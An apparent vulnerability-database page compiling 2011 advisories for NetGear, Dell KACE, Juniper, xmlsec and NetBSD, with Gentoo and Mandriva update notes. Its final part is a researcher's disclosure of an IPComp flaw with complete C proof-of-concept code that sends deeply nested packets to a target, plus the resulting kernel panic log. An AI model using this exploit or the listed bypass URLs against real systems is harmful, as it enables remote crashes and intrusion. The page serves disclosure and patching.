VARIoT IoT vulnerabilities database


VAR-201104-0211 CVE-2011-1674 NetGear ProSafe WNAP210 Security Bypass Vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
The NetGear ProSafe WNAP210 with firmware 2.0.12 allows remote attackers to bypass authentication and obtain access to the configuration page by visiting recreate.php and then visiting index.php. The NetGear WNAP210 is vulnerable to remote administrator password disclosure and administrative web page login bypass. The Netgear ProSafe Wireless Access Point (WNAP210) has multiple vulnerabilities; the WNAP210 provided by Netgear has two vulnerabilities. The device configuration stores the administrator password in clear text. NETGEAR WNAP210 has a security bypass vulnerability in its implementation. WNAP210 firmware 2.0.12 is vulnerable; other versions may also be affected.

Secunia advisory:

TITLE: NetGear WNAP210 Backup Disclosure and Authentication Bypass Vulnerabilities
SECUNIA ADVISORY ID: SA44045
VERIFY ADVISORY: http://secunia.com/advisories/44045/
RELEASE DATE: 2011-04-06
DESCRIPTION: Two vulnerabilities have been reported in Netgear ProSafe Wireless-N Access Point WNAP210, which can be exploited by malicious people to disclose sensitive information and bypass certain security restrictions.
SOLUTION: Update to the latest firmware. Please contact the vendor for more details.
PROVIDED AND/OR DISCOVERED BY: Trevor Seward via US-CERT.
ORIGINAL ADVISORY: US-CERT VU#644812: http://www.kb.cert.org/vuls/id/644812
VAR-201104-0210 CVE-2011-1673 NetGear ProSafe WNAP210 Information Disclosure Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
BackupConfig.php on the NetGear ProSafe WNAP210 allows remote attackers to obtain the administrator password by reading the configuration file. The Netgear ProSafe Wireless Access Point (WNAP210) has multiple vulnerabilities; the WNAP210 provided by Netgear has two vulnerabilities. An attacker with network access to the device can browse to http://NetGearDeviceIP/BackupConfig.php, which prompts the attacker to download the device configuration without any login authentication. Access to the BackupConfig.php script is not properly restricted: it can be used to download the backup configuration file, which leaks the administrator password. WNAP210 firmware 2.0.12 is vulnerable; other versions may also be affected.

Secunia advisory SA44045 (NetGear WNAP210 Backup Disclosure and Authentication Bypass Vulnerabilities, released 2011-04-06, http://secunia.com/advisories/44045/) covers both WNAP210 issues; its text is reproduced under CVE-2011-1674 above.
VAR-201104-0209 CVE-2011-1672 Dell Kace K2000 Appliance unauthenticated access and information disclosure vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The Dell KACE K2000 Systems Deployment Appliance 3.3.36822 and earlier contains a peinst CIFS share, which allows remote attackers to obtain sensitive information by reading the (1) unattend.xml or (2) sysprep.inf file, as demonstrated by reading a password. The Dell Kace K2000 Systems Deployment Appliance contains a vulnerability. The appliance uses a file share for Windows installation. This file share has the hidden attribute and contains files used by Windows at startup. Access to this file share is not restricted, so it may be accessed without authentication. In addition, Dell has released the following vulnerability information: this hidden, read-only fileshare is populated with pre- and post-installation tasks as well as deployment bootfiles and media used for Windows network operating system installs (called "Scripted Installs") and imaging (called "K-images"). This fileshare is hidden. Dell Kace K2000 is prone to a remote information-disclosure vulnerability. Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks.
VAR-201104-0328 No CVE Juniper IVE Network Connect Credential Provider Security Bypass Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
Juniper Networks' Secure Access is an enterprise-class SSL VPN access device running on Juniper IVE OS. There is an unspecified error in the Network Connect Credential Provider implementation provided by Juniper Networks Secure Access, which can be exploited by remote attackers to bypass authentication on Windows 7 and Windows Vista.

Secunia advisory:

TITLE: Juniper IVE Network Connect Credential Provider Security Bypass
SECUNIA ADVISORY ID: SA43983
VERIFY ADVISORY: http://secunia.com/advisories/43983/
RELEASE DATE: 2011-04-02
DESCRIPTION: A vulnerability has been reported in Juniper Networks Secure Access, which can be exploited by malicious people to bypass certain security restrictions.
SOLUTION: Update to version 6.5R9, 7.0R4, or 7.1R1.
PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.
ORIGINAL ADVISORY: http://www.juniper.net/alerts/viewalert.jsp?txtAlertNumber=PSN-2011-03-187&viewMode=view
VAR-201104-0096 CVE-2011-1425 WebKit Used in xslt.c Vulnerable to arbitrary file creation CVSS V2: 5.1
CVSS V3: -
Severity: MEDIUM
xslt.c in XML Security Library (aka xmlsec) before 1.2.17, as used in WebKit and other products, when XSLT is enabled, allows remote attackers to create or overwrite arbitrary files via vectors involving the libxslt output extension and a ds:Transform element during signature verification. Remote attackers can exploit this issue to read or write arbitrary XML files, which may lead to further attacks. Versions prior to XML Security Library 1.2.17 are vulnerable.

Debian update: For the oldstable distribution (lenny), this problem has been fixed in version 1.2.9-5+lenny1. For the stable distribution (squeeze), this problem has been fixed in version 1.2.14-1+squeeze1. For the testing distribution (wheezy) and unstable distribution (sid), this problem has been fixed in version 1.2.14-1.1. This fixes a vulnerability which can be exploited by malicious people to compromise a vulnerable system. For more information: SA43920. SOLUTION: Apply updated packages via the apt-get package manager.

Secunia advisory:

TITLE: XML Security Library XSLT File Access Vulnerability
SECUNIA ADVISORY ID: SA43920
VERIFY ADVISORY: http://secunia.com/advisories/43920/
RELEASE DATE: 2011-04-02
DESCRIPTION: A vulnerability has been reported in the XML Security Library, which can be exploited by malicious people to compromise a vulnerable system.
SOLUTION: Update to version 1.2.17.
PROVIDED AND/OR DISCOVERED BY: The vendor credits Nicolas Gregoire.
ORIGINAL ADVISORY: http://www.aleksey.com/pipermail/xmlsec/2011/009120.html
Gentoo Linux Security Advisory GLSA 201412-09
http://security.gentoo.org/

Severity: High
Title: Multiple packages, Multiple vulnerabilities fixed in 2011
Date: December 11, 2014
Bugs: #194151, #294253, #294256, #334087, #344059, #346897, #350598, #352608, #354209, #355207, #356893, #358611, #358785, #358789, #360891, #361397, #362185, #366697, #366699, #369069, #370839, #372971, #376793, #381169, #386321, #386361
ID: 201412-09

Synopsis
========
This GLSA contains notification of vulnerabilities found in several Gentoo packages which have been fixed prior to January 1, 2012. The worst of these vulnerabilities could lead to local privilege escalation and remote code execution. Please see the package list and CVE identifiers below for more information.

Background
==========
For more information on the packages listed in this GLSA, please see their homepage referenced in the ebuild.

Affected packages
=================
     Package                         Vulnerable           Unaffected
  1  games-sports/racer-bin          >= 0.5.0-r1          Vulnerable!
  2  media-libs/fmod                 < 4.38.00            >= 4.38.00
  3  dev-php/PEAR-Mail               < 1.2.0              >= 1.2.0
  4  sys-fs/lvm2                     < 2.02.72            >= 2.02.72
  5  app-office/gnucash              < 2.4.4              >= 2.4.4
  6  media-libs/xine-lib             < 1.1.19             >= 1.1.19
  7  media-sound/lastfmplayer        < 1.5.4.26862-r3     >= 1.5.4.26862-r3
  8  net-libs/webkit-gtk             < 1.2.7              >= 1.2.7
  9  sys-apps/shadow                 < 4.1.4.3            >= 4.1.4.3
 10  dev-php/PEAR-PEAR               < 1.9.2-r1           >= 1.9.2-r1
 11  dev-db/unixODBC                 < 2.3.0-r1           >= 2.3.0-r1
 12  sys-cluster/resource-agents     < 1.0.4-r1           >= 1.0.4-r1
 13  net-misc/mrouted                < 3.9.5              >= 3.9.5
 14  net-misc/rsync                  < 3.0.8              >= 3.0.8
 15  dev-libs/xmlsec                 < 1.2.17             >= 1.2.17
 16  x11-apps/xrdb                   < 1.0.9              >= 1.0.9
 17  net-misc/vino                   < 2.32.2             >= 2.32.2
 18  dev-util/oprofile               < 0.9.6-r1           >= 0.9.6-r1
 19  app-admin/syslog-ng             < 3.2.4              >= 3.2.4
 20  net-analyzer/sflowtool          < 3.20               >= 3.20
 21  gnome-base/gdm                  < 3.8.4-r3           >= 3.8.4-r3
 22  net-libs/libsoup                < 2.34.3             >= 2.34.3
 23  app-misc/ca-certificates        < 20110502-r1        >= 20110502-r1
 24  dev-vcs/gitolite                < 1.5.9.1            >= 1.5.9.1
 25  dev-util/qt-creator             < 2.1.0              >= 2.1.0

NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers.

25 affected packages

Description
===========
Vulnerabilities have been discovered in the packages listed below. Please review the CVE identifiers in the Reference section for details.

* FMOD Studio
* PEAR Mail
* LVM2
* GnuCash
* xine-lib
* Last.fm Scrobbler
* WebKitGTK+
* shadow tool suite
* PEAR
* unixODBC
* Resource Agents
* mrouted
* rsync
* XML Security Library
* xrdb
* Vino
* OProfile
* syslog-ng
* sFlow Toolkit
* GNOME Display Manager
* libsoup
* CA Certificates
* Gitolite
* QtCreator
* Racer

Impact
======
A context-dependent attacker may be able to gain escalated privileges, execute arbitrary code, cause Denial of Service, obtain sensitive information, or otherwise bypass security restrictions.

Workaround
==========
There are no known workarounds at this time.

Resolution
==========
All FMOD Studio users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=media-libs/fmod-4.38.00"

All PEAR Mail users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=dev-php/PEAR-Mail-1.2.0"

All LVM2 users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=sys-fs/lvm2-2.02.72"

All GnuCash users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=app-office/gnucash-2.4.4"

All xine-lib users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=media-libs/xine-lib-1.1.19"

All Last.fm Scrobbler users should upgrade to the latest version:
  # emerge --sync
  # emerge -a --oneshot -v ">=media-sound/lastfmplayer-1.5.4.26862-r3"

All WebKitGTK+ users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-1.2.7"

All shadow tool suite users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=sys-apps/shadow-4.1.4.3"

All PEAR users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=dev-php/PEAR-PEAR-1.9.2-r1"

All unixODBC users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=dev-db/unixODBC-2.3.0-r1"

All Resource Agents users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot -v ">=sys-cluster/resource-agents-1.0.4-r1"

All mrouted users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=net-misc/mrouted-3.9.5"

All rsync users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=net-misc/rsync-3.0.8"

All XML Security Library users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=dev-libs/xmlsec-1.2.17"

All xrdb users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=x11-apps/xrdb-1.0.9"

All Vino users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=net-misc/vino-2.32.2"

All OProfile users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=dev-util/oprofile-0.9.6-r1"

All syslog-ng users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=app-admin/syslog-ng-3.2.4"

All sFlow Toolkit users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=net-analyzer/sflowtool-3.20"

All GNOME Display Manager users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=gnome-base/gdm-3.8.4-r3"

All libsoup users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=net-libs/libsoup-2.34.3"

All CA Certificates users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot -v ">=app-misc/ca-certificates-20110502-r1"

All Gitolite users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=dev-vcs/gitolite-1.5.9.1"

All QtCreator users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=dev-util/qt-creator-2.1.0"

Gentoo has discontinued support for Racer. We recommend that users unmerge Racer:
  # emerge --unmerge "games-sports/racer-bin"

NOTE: This is a legacy GLSA. Updates for all affected architectures have been available since 2012. It is likely that your system is already no longer affected by these issues.

References
==========
[ 1 ] CVE-2007-4370  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4370
[ 2 ] CVE-2009-4023  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4023
[ 3 ] CVE-2009-4111  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4111
[ 4 ] CVE-2010-0778  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0778
[ 5 ] CVE-2010-1780  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1780
[ 6 ] CVE-2010-1782  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1782
[ 7 ] CVE-2010-1783  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1783
[ 8 ] CVE-2010-1784  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1784
[ 9 ] CVE-2010-1785  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1785
[ 10 ] CVE-2010-1786  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1786
[ 11 ] CVE-2010-1787  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1787
[ 12 ] CVE-2010-1788  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1788
[ 13 ] CVE-2010-1790  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1790
[ 14 ] CVE-2010-1791  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1791
[ 15 ] CVE-2010-1792  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1792
[ 16 ] CVE-2010-1793  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1793
[ 17 ] CVE-2010-1807  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1807
[ 18 ] CVE-2010-1812  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1812
[ 19 ] CVE-2010-1814  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1814
[ 20 ] CVE-2010-1815  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1815
[ 21 ] CVE-2010-2526  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2526
[ 22 ] CVE-2010-2901  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2901
[ 23 ] CVE-2010-3255  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3255
[ 24 ] CVE-2010-3257  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3257
[ 25 ] CVE-2010-3259  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3259
[ 26 ] CVE-2010-3362  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3362
[ 27 ] CVE-2010-3374  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3374
[ 28 ] CVE-2010-3389  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3389
[ 29 ] CVE-2010-3812  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3812
[ 30 ] CVE-2010-3813  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3813
[ 31 ] CVE-2010-3999  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3999
[ 32 ] CVE-2010-4042  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4042
[ 33 ] CVE-2010-4197  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4197
[ 34 ] CVE-2010-4198  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4198
[ 35 ] CVE-2010-4204  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4204
[ 36 ] CVE-2010-4206  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4206
[ 37 ] CVE-2010-4492  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4492
[ 38 ] CVE-2010-4493  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4493
[ 39 ] CVE-2010-4577  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4577
[ 40 ] CVE-2010-4578  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4578
[ 41 ] CVE-2011-0007  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0007
[ 42 ] CVE-2011-0465  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0465
[ 43 ] CVE-2011-0482  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0482
[ 44 ] CVE-2011-0721  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0721
[ 45 ] CVE-2011-0727  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0727
[ 46 ] CVE-2011-0904  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0904
[ 47 ] CVE-2011-0905  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0905
[ 48 ] CVE-2011-1072  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1072
[ 49 ] CVE-2011-1097  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1097
[ 50 ] CVE-2011-1144  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1144
[ 51 ] CVE-2011-1425  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1425
[ 52 ] CVE-2011-1572  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1572
[ 53 ] CVE-2011-1760  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1760
[ 54 ] CVE-2011-1951  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1951
[ 55 ] CVE-2011-2471  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2471
[ 56 ] CVE-2011-2472  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2472
[ 57 ] CVE-2011-2473  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2473
[ 58 ] CVE-2011-2524  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2524
[ 59 ] CVE-2011-3365  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3365
[ 60 ] CVE-2011-3366  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3366
[ 61 ] CVE-2011-3367  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3367

Availability
============
This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201412-09.xml

Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

_______________________________________________________________________

Mandriva update:

Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490

The updated packages have been patched to correct this issue.
References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1425

Updated Packages: Mandriva Linux 2009.0, Mandriva Linux 2010.0 and Mandriva Enterprise Server 5 (i586 and x86_64 xmlsec1 packages; per-file md5 checksums and file names omitted).
mes5/SRPMS/xmlsec1-1.2.10-7.3mdvmes5.2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFNmXaUmqjQ0CJFipgRAgs3AKCLIc162L+edW3LKFOx7G/U4GkynwCgpJ7j SEMdD/0Sj9XbDDepzFsOW3o= =Kuyv -----END PGP SIGNATURE-----
VAR-201105-0256 CVE-2011-1547 IPComp encapsulation nested payload vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers. A memory corruption vulnerability exists in the receive processing of multiple IPComp implementations. IPComp (RFC 3173) is generally used together with IPsec; in the KAME project, the NetBSD project and others, the code implementing IPComp and IPsec can suffer a stack-based buffer overflow when processing a crafted IPComp payload. Attack code using this vulnerability has been released. A remote third party may cause a denial of service (DoS) or execute arbitrary code. NetBSD is prone to a remote memory-corruption vulnerability because it fails to adequately check for stack overflows in nested IP Payload Compression protocol (IPComp) payloads. Attackers can exploit this issue to trigger a kernel stack overflow, resulting in the execution of arbitrary code with superuser privileges. Failed attacks may cause a denial-of-service condition. A successful exploit will completely compromise affected computers. This issue may affect systems derived from NetBSD IPComp implementations.

BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload
-------------------------------------------------------------------------------

Gruezi, this document describes CVE-2011-1547.

RFC3173 ip payload compression, henceforth ipcomp, is a protocol intended to provide compression of ip datagrams, and is commonly used alongside IPSec (although there is no requirement to do so). An ipcomp datagram consists of an ip header with ip->ip_p set to 108, followed by a 32 bit ipcomp header, described in C syntax below.
    struct ipcomp {
        uint8_t  comp_nxt;    // Next Header
        uint8_t  comp_flags;  // Reserved
        uint16_t comp_cpi;    // Compression Parameter Index
    };

The Compression Parameter Index indicates which compression algorithm was used to compress the ipcomp payload, which is expanded and then routed as requested. Although the CPI field is 16 bits wide, in reality only one algorithm is widely implemented, RFC1951 DEFLATE (cpi=2).

It's well documented that ipcomp can be used to traverse perimeter filtering; however, this document discusses potential implementation flaws observed in popular stacks. The IPComp implementation originating from NetBSD/KAME implements injection of unpacked payloads like so:

    algo = ipcomp_algorithm_lookup(cpi);

    /* ... */

    error = (*algo->decompress)(m, m->m_next, &newlen);

    /* ... */

    if (nxt != IPPROTO_DONE) {
        if ((inetsw[ip_protox[nxt]].pr_flags & PR_LASTHDR) != 0 &&
            ipsec4_in_reject(m, NULL)) {
            IPSEC_STATINC(IPSEC_STAT_IN_POLVIO);
            goto fail;
        }
        (*inetsw[ip_protox[nxt]].pr_input)(m, off, nxt);
    } else
        m_freem(m);

    /* ... */

Where inetsw[] contains definitions for supported protocols, and nxt is a protocol number, usually associated with ip->ip_p (see http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xml), but in this case taken from ipcomp->comp_nxt. m is the mbuf structure adjusted to point to the unpacked payload. The unpacked packet is dispatched to the appropriate protocol handler directly from the ipcomp protocol handler.

The NetBSD/KAME network stack is used as the basis for various other operating systems, such as Xnu, FTOS, various embedded devices and network appliances, and earlier versions of FreeBSD/OpenBSD (the code has since been refactored, but see the NOTES section regarding IPComp quines, which still permit remote, pre-authentication, single-packet, spoofed-source DoS in the latest versions). The Xnu port of this code is close to the original, where the decompressed payload is recursively injected back into the toplevel ip dispatcher.
The implementation is otherwise similar, and some alterations to the testcase provided for NetBSD should make it work. This is left as an exercise for the interested reader.

-------------------- Affected Software ------------------------

Any NetBSD derived IPComp/IPSec stack may be vulnerable (Xnu, FTOS, etc.). NetBSD is not distributed with IPSec support enabled by default; however, Apple OSX and various other derivatives are. There are so many NetBSD derived network stacks that it is infeasible to check them all; concerned administrators are advised to check with their vendor if there is any doubt.

Major vendors known to use network stacks derived from NetBSD were pre-notified about this vulnerability. If I missed you, it is either not well known that you use the BSD stack, you did not respond to security@ mail, or could not use pgp properly. Additionally, administrators of critical or major deployments of NetBSD (e.g. dns root servers) were given advance notice in order to deploy appropriate filter rules.

Exploitability of kernel stack overflows will vary by platform (n.b. a stack overflow is not a stack buffer overflow; for a concise definition see TAOCP3,V1,S2.2.2). Also note that a kernel stack overflow is very different from a userland stack overflow. For further discussion, including attacks on other operating systems, see the notes section on ipcomp quines below. However, this is not a trivial task, and is highly platform dependent. I have verified kernel stack overflows on NetBSD are exploitable; I have looked at the source code for xnu and do not see any obvious obstacles to prevent exploitation (kernel stack segment limits, guard pages, etc. which would cause the worst impact to be limited to remote denial of service), so have no reason to believe it is different. Thoughts on this topic from fellow researchers would be welcome.

Source code for a sample Linux program to reproduce this flaw on NetBSD is listed below.
Please note, check if your system requires an IPv4 header in the compressed payload before attempting to adapt it to your needs.

    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netinet/ip.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <zlib.h>
    #include <alloca.h>
    #include <stdbool.h>
    #include <stdlib.h>
    #include <string.h>

    //
    // BSD IPComp Kernel Stack Overflow Testcase
    // -- Tavis Ormandy <taviso@cmpxchg8b.com>, March 2011
    //

    #define MAX_PACKET_SIZE (1024 * 1024 * 32)
    #define MAX_ENCAP_DEPTH 1024

    enum {
        IPCOMP_OUI     = 1,
        IPCOMP_DEFLATE = 2,
        IPCOMP_LZS     = 3,
        IPCOMP_MAX,
    };

    struct ipcomp {
        uint8_t  comp_nxt;      // Next Header
        uint8_t  comp_flags;    // Reserved, must be zero
        uint16_t comp_cpi;      // Compression parameter index
        uint8_t  comp_data[0];  // Payload.
    };

    bool ipcomp_encapsulate_data(void *data, size_t size, int nxt, struct ipcomp **out, size_t *length, int level)
    {
        struct ipcomp *ipcomp;
        z_stream zstream;

        ipcomp = malloc(MAX_PACKET_SIZE);
        *out = ipcomp;

        ipcomp->comp_nxt = nxt;
        ipcomp->comp_cpi = htons(IPCOMP_DEFLATE);
        ipcomp->comp_flags = 0;

        // Compress packet payload.
        zstream.zalloc = Z_NULL;
        zstream.zfree = Z_NULL;
        zstream.opaque = Z_NULL;

        if (deflateInit2(&zstream, level, Z_DEFLATED, -12, MAX_MEM_LEVEL, Z_DEFAULT_STRATEGY) != Z_OK) {
            fprintf(stderr, "error: failed to initialize zlib library\n");
            return false;
        }

        zstream.avail_in = size;
        zstream.next_in = data;
        zstream.avail_out = MAX_PACKET_SIZE - sizeof(struct ipcomp);
        zstream.next_out = ipcomp->comp_data;

        if (deflate(&zstream, Z_FINISH) != Z_STREAM_END) {
            fprintf(stderr, "error: deflate() failed to create compressed payload, %s\n", zstream.msg);
            return false;
        }

        if (deflateEnd(&zstream) != Z_OK) {
            fprintf(stderr, "error: deflateEnd() returned failure, %s\n", zstream.msg);
            return false;
        }

        // Calculate size.
        *length = (MAX_PACKET_SIZE - sizeof(struct ipcomp)) - zstream.avail_out;

        ipcomp = realloc(ipcomp, *length);

        free(data);

        return true;
    }

    int main(int argc, char **argv)
    {
        int s;
        struct sockaddr_in sin = {0};
        struct ipcomp *ipcomp = malloc(0);
        size_t length = 0;
        unsigned depth = 0;

        // Nest an ipcomp packet deeply without compression, this allows us to
        // create maximum redundancy.
        for (depth = 0; depth < MAX_ENCAP_DEPTH; depth++) {
            if (ipcomp_encapsulate_data(ipcomp, length, IPPROTO_COMP, &ipcomp, &length, Z_NO_COMPRESSION) != true) {
                fprintf(stderr, "error: failed to encapsulate data\n");
                return 1;
            }
        }

        // Create a final outer packet with best compression, which should now
        // compress well due to Z_NO_COMPRESSION used in inner payloads.
        if (ipcomp_encapsulate_data(ipcomp, length, IPPROTO_COMP, &ipcomp, &length, Z_BEST_COMPRESSION) != true) {
            fprintf(stderr, "error: failed to encapsulate data\n");
            return 1;
        }

        fprintf(stdout, "info: created %u nested ipcomp payload, %u bytes\n", depth, length);

        sin.sin_family = AF_INET;
        sin.sin_port = htons(0);
        sin.sin_addr.s_addr = inet_addr(argv[1]);

        if ((s = socket(PF_INET, SOCK_RAW, IPPROTO_COMP)) < 0) {
            fprintf(stderr, "error: failed to create socket, %m\n");
            return 1;
        }

        if (sendto(s, ipcomp, length, MSG_NOSIGNAL, (const struct sockaddr *)(&sin), sizeof(sin)) != length) {
            fprintf(stderr, "error: send() returned failure, %m\n");
            return 1;
        }

        fprintf(stdout, "info: success, packet sent to %s\n", argv[1]);

        free(ipcomp);

        return 0;
    }

Packets of the following form are generated.

    Internet Protocol, Src: 192.168.1.1, Dst: 192.168.1.2
        Version: 4
        Header length: 20 bytes
        Differentiated Services Field: 0x04 (DSCP 0x01: Unknown DSCP; ECN: 0x00)
            0000 01.. = Differentiated Services Codepoint: Unknown (0x01)
            .... ..0. = ECN-Capable Transport (ECT): 0
            .... ...0 = ECN-CE: 0
        Total Length: 205
        Identification: 0xc733 (50995)
        Flags: 0x00
            0.. = Reserved bit: Not Set
            .0. = Don't fragment: Not Set
            ..0 = More fragments: Not Set
        Fragment offset: 0
        Time to live: 64
        Protocol: IPComp (0x6c)
        Header checksum: 0x2e69 [correct]
            [Good: True]
            [Bad : False]
        Source: 192.168.1.1
        Destination: 192.168.1.2
    IP Payload Compression
        Next Header: IPComp (0x6c)
        IPComp Flags: 0x00
        IPComp CPI: DEFLATE (0x0002)
    Data (181 bytes)
        Data: 73656158...
        [Length: 181]

    $ gcc ipcomp.c -lz -o ipcomp
    $ sudo ./ipcomp 192.168.1.2
    info: created 1024 nested ipcomp payload, 2538 bytes
    info: success, packet sent to 192.168.1.2

    Mar 25 05:34:40 /netbsd: uvm_fault(0xca7bc774, 0x1000, 1) -> 0xe
    Mar 25 05:34:40 /netbsd: fatal page fault in supervisor mode
    Mar 25 05:34:40 /netbsd: trap type 6 code 0 eip c0633269 cs 8 eflags 10202 cr2 1335 ilevel 0
    Mar 25 05:34:40 /netbsd: panic: trap
    Mar 25 05:34:40 /netbsd: Begin traceback...
    Mar 25 05:34:40 /netbsd: uvm_fault(0xca7bc774, 0, 1) -> 0xe
    Mar 25 05:34:40 /netbsd: fatal page fault in supervisor mode
